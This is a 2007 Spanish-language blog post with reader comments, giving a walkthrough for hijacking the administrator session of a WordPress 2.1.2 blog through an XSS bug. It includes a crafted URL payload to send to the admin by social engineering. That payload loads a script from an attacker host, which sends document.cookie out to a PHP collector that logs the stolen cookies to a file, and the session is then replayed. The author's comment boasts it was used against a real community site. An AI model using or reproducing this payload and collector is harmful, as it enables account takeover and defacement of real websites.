El dia de hoy he decidido publicar como podemos defacearnos/hackearnos un blog que utiliza worpress 2.1.2 aprovechandonos de un bug xss que posee. Primero aremos lo siguientes:
Si no sabemos que version de wordpress usa, si usamos firefox, damos click derecho y luego a ver codigo fuente o tambien ctrl + u y buscamos esto:
meta name="generator" content="WordPress 2.1.2" /
Utilizando un poco de ingieneria social le mandamos al administrador de la web un link que contenga esto:
?title%3E%3Ch1%3Esip%3C/h1%3E%3CIMG%20SRC=javascript:location.href=http://tuweb.com/a.js%3E
Donde el archivo a.js contiene:
i=new/**/Image();i.src='http://tuweb.com/adv.php?cookie=’+document.cookie;
Y con este archivo robas la cookie
$cookie = $_REQUEST[cookie]; $fic=fopen("cookie.txt", "a"); fwrite($fic, "$cookie\n"); fclose($fic);
Y luego cuando ya tenemos la cookie del administrador simplemente lo editamos con el achilles o tamper data.
Esto es solo para uso educativo xD.
April 24th, 2007 at 21:49
Lo voy a probar a ver si funciona.
April 25th, 2007 at 12:52
funcionar funciona, es aprovechandonos de ese bug xss que presentan los blogs en wordpress 2.1.2 yo lo he probado conmiho mismo, y tambien megabyte lo uso contra el-hacker.org, si conoces esta comunidad sabras que funciona, y otros amigos lo han usado.
Solo algo mas es para uso educativo y de aprendisaje xD